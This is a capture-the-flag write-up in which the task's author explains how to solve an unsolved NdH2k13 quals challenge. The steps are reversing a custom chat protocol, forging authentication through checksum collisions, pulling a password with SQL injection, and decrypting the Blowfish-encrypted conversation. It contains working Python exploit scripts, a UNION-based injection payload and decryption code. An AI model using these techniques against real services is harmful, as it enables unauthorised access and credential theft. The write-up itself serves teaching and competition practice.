NdH2k13 Quals Misc500 write-up [en]
Publié le 18 mars 2013

Ndh2k13 quals got 352 participating teams and last only 24 hours, with only 14 tasks to solve. Among them, the Misc500 (namely "Wiretapped communication") stays unsolved and we think interesting to share with all of you the way it was intended to be solved. I created this task based on my professional experience, to make it look like a concrete and real case. Here is how to solve it.

Contestants were provided with a ZIP file, containing a network capture (a PCAP dump) and what seems to be a binary version of the server program used by John Adams to communicate securely. The communication protocol is weird but having a look at an hexdump of the conversation allows us to draw some hypothesis.

Analyzing the PCAP dump

First of all, there seems to be a common pattern in the exchanged data. Many blocks of information starts with a byte, then what seems to be a 32-bit coded size, then this exact number of bytes and 4 extra bytes. No idea of what it is or how it is used. Anyway, some cleartext appears in the first bytes sent by the client :

00000000  01 0b 00 00 00 6a 6f 68  6e 2e 61 64 61 6d 73 00 .....joh n.adams.
00000010  24 7f a8 19                                      $...

"john.adams" is 10 bytes long, 11 (0x0b) with the null character, but some extra bytes left and we have no clue about it. The first byte seems to be a message ID or something like this, but this has to be confirmed with the reverse-engineering of the binary application.

All the messages exchanged between the client and the server are built upon this pattern, however there is no more cleartext past the first message sent by the client, that probably means a kind of encryption is used to ensure confidentiality.

Running the binary

The binary file is a 64-bit ELF executable :

$ file protoss
protoss: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0x93f6def440dcf9552dee2f55efad461e72f1516e, stripped

Simply running the binary raises many error messages stating some libraries are missing :

$ ./protoss
./protoss: error while loading shared libraries: libboost_system.so.1.42.0: cannot open shared object file: No such file or directory
...
./protoss: error while loading shared libraries: libmysqlcppconn.so.4: cannot open shared object file: No such file or directory
...
./protoss: error while loading shared libraries: libcrypto.so.0.9.8: cannot open shared object file: No such file or directory
...

Seems this binary uses a MySQL connection and some crypto APIs, pretty interesting. If you try to use LD_PRELOAD or something similar, you may experience some troubles with the MySQL C++ connector library, as I did during my tests. Anyway, the MySQL connection step seems to work when using the correct libraries in conjonction with the LD_PRELOAD trick, that’ll do the job.

To make it work, use OpenSSL version 0.9.8, MysqlCppConnector, Boost System, and Boost Thread MT libraries. Mysql user is ’protoss’ with a password of ’XXXXXXXXXXX’ with full access to a database called ’proto’ and a table named ’proto’. Its schema and content are provided in the archive at the end of this post.

Strings first !

Searching for strings in the binary application is always a good idea, and sure it was for this task too. You may have spot these strings :

tcp://127.0.0.1:3306
proto
protoss
XXXXXXXXXXX

This is pretty much an SQL connection string, and maybe some credentials. After some tests using the LD_PRELOAD trick with the original libraries (using every correct version), you would find the correct combination and therefore the following connection string :

mysql://protoss:XXXXXXXXXXX@127.0.0.1:proto

It is straightforward to set up a MySQL server on your machine, create a database named "proto" and create a "protoss" user identified by the password "XXXXXXXXXXX". Once done, running the binary again displays an informational string stating the database connection is perfectly working :

[messaging] connecting to database ....
[messaging] starting ...

During my tests, I was not able to perform requests using a more recent version of the MySQL C++ connector library. I decided to make a deep analysis of this binary using only IDA instead of debugging the server. But if you find the correct system configuration with the exact same versions of all the libs, you would be able to have more information by debugging it.

However, running a netstat showed that this process listens on port 2013. If you were a bit curious about z0b.nuitduhack.com, you’d have noticed the same port listening. Keep it in mind, and continue the reading.

Finding the custom checksum algorithm ...

The first strange thing we observed by analyzing the provided PCAP file was the pattern itself. If the server is able to communicate with some client software, it must be able to parse the messages it receives. And there must be a piece of code for that. Starting from the socket’s related functions (accept(), send(), recv()), you may eventually found in the program the piece of code handling this stuff.

Our hypothesis is now confirmed : the server reads 1 byte, then 4 bytes followed by a variable-length set of bytes :

The server software also checks the last 4 bytes by using a strange function located at 407F1E. This function looks like a kind of checksum :

The corresponding C code :

  1. unsigned int checksum(unsigned char *buffer, int size)
  2. {
  3. int i;
  4. unsigned int cs = 0xD34DB33F;
  5. for (i=0; i<size; i++)
  6. cs = ((cs^0x7BF239A) * buffer[i])^0x19A87F24;
  7. return cs;
  8. }

It is easy to check if we got a valid checksum algorithm by applying it to a message from the dump :

  1. def checksum(bytes):
  2. cs=0xD34DB33F;
  3. for b in bytes:
  4. cs = (((cs^0x7BF239A)*ord(b))&0xFFFFFFFF)^0x19A87F24
  5. return cs
  6.  
  7. test_set = [
  8. ("010b0000006a6f686e2e6164616d7300".decode('hex'), 0x19A87F24),
  9. ]
  10. for b,cs in test_set:
  11. print checksum(b)==cs

... and abuse it to bypass authentication !

A deeper analysis of the target binary reveals that the same checksum function is used during the authentication process :

The resulting checksum is encoded into an hexadecimal form and then checked with the string returned by the client : if it matches that means the client was able to compute the checksum and therefore knows the password.

To summup the authentication process :
1. Client send to the server its username (message code : 01)
2. Server generates a random string (20 bytes) and send it to the client (message code : 02)
3. Client computes checksum(password+randomstring) and send it encoded in hexa to the server (message code : 03)
4. Server computes the same (should have the password stored in plain text in the database), encodes, and compares both strings : if they are equals, user is authenticated (or not). (message code : 04 or 05)

Be careful, the hex encoding used by the remote program is in fact an hexdump of the unsigned integer value, not the value itself that is hex encoded.

The authentication success message contains a session key intended to be used to encrypt the rest of the communication, but this message is encrypted with the user’s password.

Based on this analysis, breaking the password with only a single checksum computed from this password and a randomly generated string will not be enough. Originally, z0b.nuitduhack.com hosted all the services related to the CTF, and had its port 2013 open. Remember, protoss server listens on this port. What if we try to authenticate without knowing John Adams’ password ? What if we find another password (shorter than the original one) that matches the same checksum ?

With a 32-bit long checksum, a good approach consists in looking for collisions. Starting from a 3-byte long collision, I wrote this little python script and run it to determine how many collision exists with this setup :

  1. def checksum(bytes):
  2. cs=0xD34DB33F;
  3. for b in bytes:
  4. cs = (((cs^0x7BF239A)*ord(b))&0xFFFFFFFF)^0x19A87F24
  5. return cs
  6.  
  7. challenge = '794a4b635f716e464c584c6d765b7474715e6543'.decode('hex')
  8. i=0
  9. for a in range(0,256):
  10. for b in range(0,256):
  11. for c in range(0,256):
  12. if checksum('%c%c%c%s' % (a,b,c,challenge))==0xE1649BEC:
  13. i += 1
  14. print '%03d => %02x%02x%02x' %(i, a,b,c)

I then ran this program and got this :

001 => 0048f3
002 => 01a0cb
...
321 => ff83ea
322 => ffad76

322 collisions, this is very few but not sure if this will work with the remote server. Well, let’s give it a try with a dedicated python script :

  1. import socket
  2. import sys
  3. from struct import pack,unpack
  4.  
  5. def toHex(v):
  6. hx = ''
  7. for i in range(4):
  8. hx+=hex(v&0xFF)[2:].rjust(2,'0').upper()
  9. v = v>>8
  10. return hx
  11.  
  12. def readMsg(s):
  13. op = s.recv(1)
  14. size = s.recv(4)
  15. while len(size)<4:
  16. size += s.recv(4-len(size))
  17. size_ = unpack('<I',size)[0]
  18. payload = s.recv(size_)
  19. while len(payload)<size_:
  20. payload += s.recv(size_ - len(payload))
  21. checksum = s.recv(4)
  22. while len(checksum)<4:
  23. checksum += s.recv(4-len(checksum))
  24. return (ord(op),payload,checksum)
  25.  
  26. def tryAuth(username, password):
  27. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  28. s.connect(('127.0.0.1',2013))
  29. # replay authentication request message
  30. print '[+] Sending authentication request, waiting for a challenge ...'
  31. s.send('010b0000006a6f686e2e6164616d7300247FA819'.decode('hex'))
  32. # wait for a message
  33. op,payload,cs = readMsg(s)
  34. # extract challenge
  35. if op==2:
  36. challenge = payload[:20]
  37. print '[+] Got challenge: <%s>' % challenge
  38. answer = toHex(checksum(password+challenge))
  39. msg = '\x03\x09\x00\x00\x00%s\x00' % answer
  40. cs = checksum(msg)
  41. msg += pack('<I',cs)
  42. print msg.encode('hex')
  43. print '[+] Send answer ...'
  44. s.send(msg)
  45. op,payload,cs = readMsg(s)
  46. return op==0x14
  47. else:
  48. return False
  49.  
  50. def checksum(bytes):
  51. cs=0xD34DB33F;
  52. for b in bytes:
  53. cs = (((cs^0x7BF239A)*ord(b))&0xFFFFFFFF)^0x19A87F24
  54. return cs
  55.  
  56. challenge = '794a4b635f716e464c584c6d765b7474715e6543'.decode('hex')
  57. i=0
  58. for a in range(0,256):
  59. for b in range(0,256):
  60. for c in range(0,256):
  61. if checksum('%c%c%c%s' % (a,b,c,challenge))==0xE1649BEC:
  62. i += 1
  63. pwd = '%c%c%c' % (a,b,c)
  64. if tryAuth('john.adams',pwd):
  65. print 'Gotcha ! -> %02x%02x%02x' % (a,b,c)
  66. sys.exit(1)

Run this script against the server :

$ python authbypass.py
[+] Sending authentication request, waiting for a challenge ...
[+] Got challenge: <QREOIapVMr^\yeJQ_Twp>
0309000000453446304130393100247fa819
[+] Send answer ...
Gotcha ! -> 0048f3

Yippikaye, we found a valid collision !

Time to rule ’em all !

Okay, we are now authenticated on the remote server as John Adams, but his password is still missing and is required to decrypt the entire conversation. Even with a checksum collision, we will not be able to retrieve this password. We have to find another way to get this damned password.

In the message processing function (4041CA), you may notice a particular message type that calls many functions to retrieve the last seen date of a given nick from the database :

This SQL query is not prepared and prone to an injection. We can abuse it to retrieve whatever we want, but we have to be authenticated to send this message, otherwise the server will not process it. Hurray, we previously found a way to fake an authentication, and this message does not seem to require encryption !

Let’s improve our exploit :

  1. import socket
  2. import sys
  3. from struct import pack,unpack
  4.  
  5. def toHex(v):
  6. hx = ''
  7. for i in range(4):
  8. hx+=hex(v&0xFF)[2:].rjust(2,'0').upper()
  9. v = v>>8
  10. return hx
  11.  
  12. def readMsg(s):
  13. op = s.recv(1)
  14. size = s.recv(4)
  15. while len(size)<4:
  16. size += s.recv(4-len(size))
  17. size_ = unpack('<I',size)[0]
  18. payload = s.recv(size_)
  19. while len(payload)<size_:
  20. payload += s.recv(size_ - len(payload))
  21. checksum = s.recv(4)
  22. while len(checksum)<4:
  23. checksum += s.recv(4-len(checksum))
  24. return (ord(op),payload,checksum)
  25.  
  26.  
  27. def exploitSqli(username, password):
  28. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  29. s.connect(('127.0.0.1',2013))
  30. # replay authentication request message
  31. print '[+] Sending authentication request, waiting for a challenge ...'
  32. s.send('010b0000006a6f686e2e6164616d7300247FA819'.decode('hex'))
  33. # wait for a message
  34. op,payload,cs = readMsg(s)
  35. # extract challenge
  36. if op==2:
  37. challenge = payload[:20]
  38. print '[+] Got challenge: %s' % challenge
  39. answer = toHex(checksum(password+challenge))
  40. msg = '\x03\x09\x00\x00\x00%s\x00' % answer
  41. cs = checksum(msg)
  42. msg += pack('<I',cs)
  43. print '[+] Send answer ...'
  44. s.send(msg)
  45. op,payload,cs = readMsg(s)
  46. if op==0x14:
  47. # send last seen msg
  48. payload = "t' and 1=0 union select pwd FROM proto WHERE nick='john.adams' #\x00"
  49. msg = "\x07"+pack('<I',len(payload))+payload
  50. cs = checksum(msg)
  51. msg += pack('<I',cs)
  52. s.send(msg)
  53. op,payload,cs = readMsg(s)
  54. #print '[+] Got pwd: %s' % payload
  55. return payload
  56. else:
  57. return None
  58. else:
  59. return None
  60.  
  61. def tryAuth(username, password):
  62. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63. s.connect(('127.0.0.1',2013))
  64. # replay authentication request message
  65. print '[+] Sending authentication request, waiting for a challenge ...'
  66. s.send('010b0000006a6f686e2e6164616d7300247FA819'.decode('hex'))
  67. # wait for a message
  68. op,payload,cs = readMsg(s)
  69. # extract challenge
  70. if op==2:
  71. challenge = payload[:20]
  72. print '[+] Got challenge: <%s>' % challenge
  73. answer = toHex(checksum(password+challenge))
  74. msg = '\x03\x09\x00\x00\x00%s\x00' % answer
  75. cs = checksum(msg)
  76. msg += pack('<I',cs)
  77. print '[+] Send answer ...'
  78. s.send(msg)
  79. op,payload,cs = readMsg(s)
  80. return op==0x14
  81. else:
  82. return False
  83.  
  84. def checksum(bytes):
  85. cs=0xD34DB33F;
  86. for b in bytes:
  87. cs = (((cs^0x7BF239A)*ord(b))&0xFFFFFFFF)^0x19A87F24
  88. return cs
  89.  
  90. challenge = '794a4b635f716e464c584c6d765b7474715e6543'.decode('hex')
  91. i=0
  92. for a in range(0,256):
  93. for b in range(0,256):
  94. for c in range(0,256):
  95. if checksum('%c%c%c%s' % (a,b,c,challenge))==0xE1649BEC:
  96. i += 1
  97. pwd = '%c%c%c' % (a,b,c)
  98. real_pwd = exploitSqli('john.adams',pwd)
  99. if real_pwd is not None:
  100. print '[+] John Adams password: %s' % real_pwd
  101. sys.exit(1)

Once done, we launched again our exploit against the remote service :

$ python exploit.py
[+] Sending authentication request, waiting for a challenge ...
[+] Got challenge: U^WGxQGfsID^AiSpQTcZ
[+] Send answer ...
[+] John Adams password: RbUmJhFG2mZD238_TvdFv0ww1

Here it is, our precious sesame : RbUmJhFG2mZD238_TvdFv0ww1 !

And now, ladies and gentlemen ...

With this password, you may be able to recover the entire conversation between John Adams and his friend. But remember, this conversation is encrypted using a session key, so we first need to decrypt the session key to be able to decrypt the following messages. Session key is sent in the authentication reply by the server, this corresponds to this encrypted data (hexdump) :

b91434faab2512dd3bd7d5a79353554de5fbd9316675694314eb6be6fc41623992e4b9825721de48

This data is composed of 40 bytes (multiple of 8 bytes, since the encryption algorithm used is Blowfish). The password is expanded to a multiple of 8 bytes by the server and then used as a key to encrypt the session key. If you had a look to the imported functions, you’d see that EVP functions are used (provided by OpenSSL). I wrote a little program to decrypt the session key and the messages exchanged using the same functions :

  1. #include <iostream>
  2. #include <cstring>
  3. #include <openssl/evp.h>
  4.  
  5. /**
  6.  * Expanded password
  7.  *
  8.  * Expansion is performed by cycling around the password's chars until its size
  9.  * is a multiple of 8.
  10.  */
  11. #define KEY "RbUmJhFG2mZD238_TvdFv0ww1RbUmJhF"
  12.  
  13. using namespace std;
  14.  
  15. /* Raw encrypted messages extracted from the PCAP, without header and checksum */
  16. unsigned char talks[][256] = {
  17. {0x61, 0xf7, 0xc8, 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33, 0x6f, 0x05, 0x23, 0x82, 0x27, 0x1d, 0xf9, 0xbb, 0x9a, 0x0c, 0xa4, 0xbe, 0x15, 0x3c, 0x39, 0xe9, 0xac, 0x16, 0xcb, 0xe9, 0x98},
  18. {0x20, 0xa4, 0xcb, 0x07, 0x58, 0x0a, 0xa2, 0x3f, 0xe1, 0x54, 0x35, 0x80, 0xeb, 0xf3, 0xcc, 0x2f},
  19. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x87, 0xad, 0x50, 0xdc, 0xe7, 0x1f, 0x62, 0x76, 0x5e, 0x6c, 0xf3, 0x26, 0xa6, 0x50, 0x77, 0x91},
  20. {0x05, 0xdc, 0x6b, 0x04, 0x7a, 0x75, 0x49, 0x5a, 0x5e, 0x9b, 0xf5, 0x2b, 0x93, 0x49, 0xaa, 0xc4},
  21. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0xf4, 0x9b, 0x8c, 0xe5, 0xe4, 0x82, 0xdb, 0x4d, 0x4a, 0x8f, 0x59, 0x7e, 0xe1, 0xcd, 0xcf, 0x5e},
  22. {0x61, 0xf7, 0xc8, 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33, 0x6f, 0x05, 0x23, 0x82, 0x27, 0xa4, 0x4e, 0x04, 0x5e, 0xd8, 0x8b, 0xdd, 0xd0, 0xbf, 0x0e, 0x95, 0x14, 0x52, 0xb7, 0xfc, 0xc6},
  23. {0x54, 0x0a, 0x08, 0x3f, 0x61, 0x3c, 0x89, 0xb2},
  24. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x47, 0x6b, 0xc0, 0xa4, 0xfb, 0x58, 0x02, 0x42, 0xfe, 0x62, 0xaa, 0xe2, 0xb9, 0x58, 0x28, 0xe5},
  25. {0x26, 0xaa, 0x71, 0x7d, 0x78, 0xda, 0x9b, 0xc0, 0x38, 0xf0, 0xf4, 0x46, 0xeb, 0xc2, 0x85, 0xd3, 0x3b, 0xfd, 0xb1, 0xec, 0x6e, 0x91, 0x52, 0x1b, 0x57, 0xa0, 0x92, 0x02, 0x0d, 0xf5, 0x76, 0xaa, 0x3a, 0xc0, 0xca, 0x27, 0x54, 0x51, 0x45, 0x5e, 0xb4, 0xa9, 0xb9, 0x68, 0x6e, 0x9e, 0x7e, 0xd1, 0xac, 0x63, 0x18, 0x8d, 0x2a, 0x7e, 0x04, 0xe1, 0xf7, 0x04, 0x35, 0x1b, 0x12, 0x8a, 0x42, 0x4d},
  26. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x45, 0x54, 0x21, 0xde, 0xc1, 0xe2, 0x40, 0x72, 0x91, 0xe2, 0xa3, 0x7c, 0x82, 0xbb, 0x96, 0x34, 0x01, 0x70, 0xea, 0xd4, 0x99, 0x10, 0x7a, 0xf4, 0x8e, 0x29, 0xea, 0x31, 0x15, 0xb1, 0x8c, 0xbf, 0xff, 0x6d, 0x4d, 0x0f, 0xf8, 0x81, 0xa6, 0x4c, 0xa6, 0x2e, 0x92, 0x97, 0x60, 0x87, 0x41, 0x15, 0xfc, 0x64, 0x17, 0xaf, 0x33, 0xaf, 0x38, 0x9b, 0x68, 0x57, 0xf3, 0x7e, 0xf5, 0x7e, 0x43, 0x43, 0xfe, 0x62, 0xaa, 0xe2, 0xb9, 0x58, 0x28, 0xe5},
  27. {0x61, 0xf7, 0xc8, 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33, 0x6f, 0x05, 0x23, 0x82, 0x27, 0x30, 0x83, 0x53, 0xe5, 0x06, 0x53, 0x71, 0x02, 0xde, 0x08, 0xb4, 0x48, 0xaf, 0x73, 0x43, 0x1c, 0x43, 0x1b, 0xe7, 0x9f, 0x08, 0x4d, 0x63, 0x71, 0xc6, 0xc6, 0x95, 0x6e, 0x1e, 0x1f, 0x2d, 0x70, 0x07, 0xf3, 0xdc, 0x0d, 0x30, 0xba, 0x2c, 0xb3, 0x61, 0xf8, 0xbb, 0x33, 0x52, 0xa7, 0x1f, 0xe5, 0xa8, 0x07, 0xf9, 0xfb, 0xd3, 0xe1, 0x8d, 0x65},
  28. {0x61, 0xf7, 0xc8,
  29. 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33,
  30. 0x6f, 0x05, 0x23, 0x82, 0x27, 0x01, 0xec, 0x16,
  31. 0x21, 0x8d, 0x7c, 0xb8, 0x8e, 0x44, 0x34, 0x90,
  32. 0x90, 0x5b, 0xcb, 0x07, 0x97, 0x6a, 0xd2, 0xf5,
  33. 0x6b, 0x89, 0x71, 0x26, 0x3b, 0x26, 0x0c, 0x9d,
  34. 0xff, 0x25, 0x7e, 0x68, 0xc8, 0x71, 0x1f, 0x4d,
  35. 0x21, 0xcd, 0xe5, 0x68, 0x46, 0x9b, 0xca, 0x38,
  36. 0x16, 0x6d, 0x0a, 0xe8, 0xa5, 0x96, 0xe1, 0xfc,
  37. 0xeb, 0xf8, 0xe2, 0xd6, 0x40},
  38. {0x8d, 0x63, 0x34,
  39. 0x9e, 0xa3, 0xf2, 0x8f, 0x31},
  40. {0x5f, 0xec, 0x8c,
  41. 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x20, 0x6e, 0xb9,
  42. 0x8e, 0x3c, 0x79, 0x66, 0x47, 0xfe, 0x62, 0xaa,
  43. 0xe2, 0xb9, 0x58, 0x28, 0xe5},
  44. {0x1d, 0x4e, 0x8f, 0xa9, 0xe5, 0xab, 0xcf, 0x92, 0x46, 0xd0, 0xbb, 0xa5, 0x17, 0xa8, 0xac, 0x57, 0xd9, 0xfa, 0xb0, 0xbf, 0xb8, 0x33, 0x81, 0x3a, 0xc7, 0x13, 0x49, 0xfb, 0x78, 0x6a, 0x48, 0x33, 0x71, 0x6d, 0xea, 0x4a, 0xce, 0x58, 0xb7, 0x13, 0xf9, 0xf7, 0x18, 0x4c, 0xf9, 0x54, 0x75, 0xb5, 0x32, 0x05, 0x88, 0xd5, 0xf1, 0x7a, 0xba, 0x15, 0xe3, 0xc4, 0xf0, 0xa5, 0x14, 0xf5, 0x4e, 0x7a, 0xc8, 0xdd, 0xa7, 0x03, 0x2e, 0x94, 0xca, 0xe8, 0xb1, 0x22, 0x2c, 0xc7, 0x7b, 0x65, 0xba, 0x97, 0x8b, 0x19, 0xe2, 0x71, 0x04, 0x1a, 0x4e, 0x0d, 0x8c, 0xfd, 0xf3, 0x1c, 0x83, 0x42, 0xe0, 0x57},
  45. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x2a, 0xb4, 0x36, 0x5a, 0x8d, 0x0c, 0x4e, 0xed, 0xea, 0xe8, 0xeb, 0xfc, 0xe9, 0x66, 0xf7, 0x9d, 0x5f, 0x8d, 0x7f, 0x9f, 0x39, 0x32, 0xcf, 0x92, 0xf9, 0xe4, 0x36, 0xc4, 0xae, 0xef, 0x05, 0xa6, 0x18, 0x06, 0x68, 0x22, 0xf0, 0x60, 0x03, 0x1a, 0x11, 0x95, 0x48, 0x21, 0x41, 0x79, 0xbb, 0xca, 0xe3, 0x0f, 0x75, 0xa4, 0x42, 0x04, 0x15, 0xfd, 0xec, 0xa6, 0xcb, 0x90, 0x8c, 0xcd, 0xab, 0xc4, 0x54, 0x5d, 0x1d, 0xde, 0x2c, 0x55, 0xa8, 0x31, 0xfc, 0xf7, 0xc0, 0xe5, 0xda, 0x52, 0xd2, 0x39, 0x6b, 0x74, 0x4e, 0x19, 0x9a, 0xe9, 0x63, 0x1d, 0x40, 0x58, 0x49, 0x2a, 0x79, 0x06, 0xf1, 0x00},
  46. {0x61, 0xf7, 0xc8, 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33, 0x6f, 0x05, 0x23, 0x82, 0x27, 0xee, 0x96, 0x8b, 0x09, 0x3a, 0x5e, 0xe7, 0xd0, 0xf1, 0x8e, 0xa1, 0xed, 0xe9, 0xff, 0x39, 0xce, 0x87, 0xc5, 0x9d, 0x72, 0x55, 0xf5, 0xae, 0xec},
  47. {0x61, 0xf7, 0xc8, 0x5d, 0x96, 0x64, 0x36, 0x50, 0xa8, 0xee, 0x33, 0x6f, 0x05, 0x23, 0x82, 0x27, 0x64, 0xbd, 0xeb, 0x08, 0x5f, 0x86, 0xe8, 0xf8, 0xd3, 0xdb, 0x56, 0xe3, 0x8d, 0x30, 0x0a, 0x42, 0x04, 0xf1, 0x7c, 0x72, 0xd9, 0x49, 0x41, 0x97},
  48. {0xae, 0xba, 0x9b, 0x53, 0xc6, 0x38, 0xb2, 0xbc, 0xfe, 0x62, 0xaa, 0xe2, 0xb9, 0x58, 0x28, 0xe5},
  49. {0x5f, 0xec, 0x8c, 0x6c, 0x9a, 0xa0, 0x40, 0x7e, 0x1d, 0xc2, 0x79, 0xf5, 0x37, 0x42, 0x1b, 0x1d, 0xcf, 0xa7, 0xb6, 0x50, 0xfb, 0x8b, 0x05, 0x69}
  50. };
  51.  
  52. int round(int a)
  53. {
  54. return (a/8)*8 + ((a%8>0)?8:0);
  55. }
  56.  
  57. int main(int argc, char **argv)
  58. {
  59. int i;
  60. EVP_CIPHER_CTX ctx;
  61. EVP_CIPHER_CTX_init(&ctx);
  62. unsigned char key[256];
  63. int buflen = 0,tmplen=0;
  64. /* Raw encrypted session key */
  65. unsigned char bufferin[] = "\xb9\x14\x34\xfa\xab\x25\x12\xdd\x3b"
  66. "\xd7\xd5\xa7\x93\x53\x55\x4d\xe5\xfb"
  67. "\xd9\x31\x66\x75\x69\x43\x14\xeb\x6b"
  68. "\xe6\xfc\x41\x62\x39\x92\xe4\xb9\x82"
  69. "\x57\x21\xde\x48";
  70. unsigned char bufferout[256];
  71.  
  72. EVP_DecryptInit_ex(&ctx, EVP_bf_ecb(), NULL, (unsigned char* )KEY, NULL);
  73. EVP_DecryptUpdate(&ctx, bufferout, &buflen, bufferin, 40);
  74. EVP_DecryptFinal_ex(&ctx, bufferout+buflen, &tmplen);
  75. EVP_CIPHER_CTX_cleanup(&ctx);
  76.  
  77. cout << "Session Key: "<<bufferout<<endl;
  78. memcpy(key, bufferout, 256);
  79. for (i=0; i<20; i++)
  80. {
  81. buflen = 0;
  82. tmplen = 0;
  83. EVP_DecryptInit_ex(&ctx, EVP_bf_ecb(), NULL, key, NULL);
  84. EVP_DecryptUpdate(&ctx, bufferout, &buflen, talks[i], round(strlen((const char *)talks[i])));
  85. EVP_DecryptFinal_ex(&ctx, bufferout+buflen, &tmplen);
  86. EVP_CIPHER_CTX_cleanup(&ctx);
  87. cout << "Talk: " << bufferout<<endl;
  88. }
  89.  
  90. return 0;
  91. }

Here are the decrypted messages :

Session Key: QAWuI_]bQwrMuqskR\NfvrbUniUsUOCQ
Talk: gunther.vanderbeck> hello =)
Talk: hi gunther
Talk: john.adams> hi gunther
Talk: how r u ?
Talk: john.adams> how r u ?
Talk: gunther.vanderbeck> fine & u ?
Talk: fine
Talk: john.adams> fine
Talk: did you managed to break what we've talked about last time ?
Talk: john.adams> did you managed to break what we've talked about last time ?
Talk: gunther.vanderbeck> ofc, got his pwd: CantSniffThisFuckingProtocol
Talk: gunther.vanderbeck> seems he tried to break into our chat system ;)
Talk: rofl
Talk: john.adams> rofl
Talk: encryption is so secure, trust me I wrote this stuff and I know what I'm talking about ^^
Talk: john.adams> encryption is so secure, trust me I wrote this stuff and I know what I'm talking about ^^
Talk: gunther.vanderbeck> u roxx dude ;)
Talk: gunther.vanderbeck> cya, gotta leave
Talk: cya dude
Talk: john.adams> cya dude

The flag was : CantSniffThisFuckingProtocol.

Conclusion

A working remote service was required to correctly exploit all the vulnerabilities and get the flag. Since the remote service is down and the provided binary not fully working on any workstation/OS, I provide the source code of this server and the related SQL sample data to those of you who want to reproduce this attack and/or try it by theirselves.

For more information or questions , do not hesitate to ask on Twitter (@virtualabs) or send an email to virtualabs -the correct symbol here- gmail -what seems to be a dot- com.